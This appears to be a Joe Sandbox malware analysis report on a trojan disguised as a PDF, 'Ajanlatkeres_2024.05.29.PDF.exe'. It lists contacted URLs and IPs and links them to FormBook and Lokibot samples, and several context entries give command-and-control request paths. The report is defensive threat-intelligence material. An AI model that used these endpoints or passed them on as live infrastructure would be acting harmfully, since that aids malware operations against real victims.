http://www.cyberxdefend.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?z$	explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mcapitalparticipacoes.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.servicepmgtl.worldReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imdcaam.com/dn03/www.lovedacademy.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cataclysmicgamingapparel.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivaness.clubReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000014.00000002.3756715275.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3755615297.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1337250517.0000000002C60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://parade.com/61481/toriavey/where-did-hamburgers-originate	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mcapitalparticipacoes.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.top-dao.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivaness.club/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cataclysmicgamingapparel.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/~T	explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jasonnutter.golf	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ioco.in	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.verxop.xyzReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.Resources	YLc7afPlL4RjCeK.exe, 0000000E.00000000.1314951505.0000000000C55000.00000002.00000001.01000000.0000000C.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, YLc7afPlL4RjCeK.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://www.lovedacademy.com/dn03/www.vivaness.club	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lovedacademy.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lovedacademy.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sukhiclothing.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.105.36.123	mbsngradnja.com	Serbia	9125	ORIONTELEKOM-ASRS	false
101.36.116.238	top-dao.com.lo1069.faipod.com	China	135377	UHGL-AS-APUCloudHKHoldingsGroupLimitedHK	true
103.224.212.213	www.vivaness.club	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
45.61.137.215	unknown	United States	40676	AS40676US	true
104.21.10.127	www.servicepmgtl.world	United States	13335	CLOUDFLARENETUS	true
34.132.146.171	www.banditsolana.com	United States	2686	ATGS-MMD-ASUS	true
3.33.130.190	sukhiclothing.com	United States	8987	AMAZONEXPANSIONGB	true
216.40.34.41	www.imdcaam.com	Canada	15348	TUCOWSCA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448989
Start date and time:	2024-05-29 15:41:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Ajanlatkeres_2024.05.29.PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/15@13/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 314 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Ajanlatkeres_2024.05.29.PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
09:42:03	API Interceptor	2x Sleep call for process: Ajanlatkeres_2024.05.29.PDF.exe modified
09:42:05	API Interceptor	22x Sleep call for process: powershell.exe modified
09:42:07	API Interceptor	1x Sleep call for process: YLc7afPlL4RjCeK.exe modified
09:42:16	API Interceptor	69x Sleep call for process: RegSvcs.exe modified
09:42:23	API Interceptor	7418387x Sleep call for process: explorer.exe modified
09:42:52	API Interceptor	7045874x Sleep call for process: chkdsk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.105.36.123	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse
103.224.212.213	Solicitud de pedido Documento No 168646080.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
	DHL Factura Electronica Pendiente documento No 04BB25083.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
	2024-09C33T37.exe	Get hash	malicious	FormBook	Browse	www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
	Proforma_Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
	003425425124526.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP
	Nuevo_orden_pdf.exe	Get hash	malicious	FormBook	Browse	www.themicheline.com/g11y/?4hOl=Q/yQLYVAGKkMZrnE0iOJNdDJIeKID0+EwORul+wPjaygN5L5fjaaMR6aEX0pRQDKm1/B&l2Mt_N=fTAlQTwhPDH
45.61.137.215	PO#34316_20240528.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	DHL Receipt_20458077822.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	SC_TR23052024.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	Purchase Inquiry_#466789.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	FedEx_776282383902.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	hgDQGUqtEg.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/3b1tenbkyj
	g1lrdXCX39.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/index?id=671120760852658
	gunzipped.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/modify?post=1
	FedEx Receipt_AWB# 102235506763.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	DHLAwb#82102199382.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/index?id=671120760852658

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mbsngradnja.com	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	77.105.36.123
parkingpage.namecheap.com	Mekanikken.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Scan Document_doc.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	Tenuto.exe	Get hash	malicious	FormBook, GuLoader, LummaC Stealer	Browse	91.195.240.19
	#U0426#U0438#U0442#U0430#U0442#U0430.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Platosammine.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	ShippingDoc_23052024.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	waybillDoc_20052024.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
www.servicepmgtl.world	0TGpiP3RIc.exe	Get hash	malicious	FormBook	Browse	104.21.10.127
www.banditsolana.com	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	34.132.146.171

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORIONTELEKOM-ASRS	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	77.105.36.123
	Doc Inv & Packing list 04015032024.exe	Get hash	malicious	AgentTesla	Browse	77.105.36.120
	4dW63OK85H.elf	Get hash	malicious	Mirai, Moobot	Browse	79.175.73.77
	SDWMUDNX8V.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	77.105.36.190
	2032473648363.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	77.105.36.190
	3182473663947752.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	77.105.36.190
	CE1J3nsJim.elf	Get hash	malicious	Mirai, Okiru	Browse	178.254.136.77
	vUvgbnhi3T.elf	Get hash	malicious	Mirai	Browse	79.175.73.97
	W58U3lImGU.elf	Get hash	malicious	Mirai	Browse	79.175.97.219
	3ZCVTnKE2z.elf	Get hash	malicious	Mirai	Browse	79.175.97.41
UHGL-AS-APUCloudHKHoldingsGroupLimitedHK	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	152.32.189.143
	http://wuyouo.cn/	Get hash	malicious	Unknown	Browse	23.91.97.62
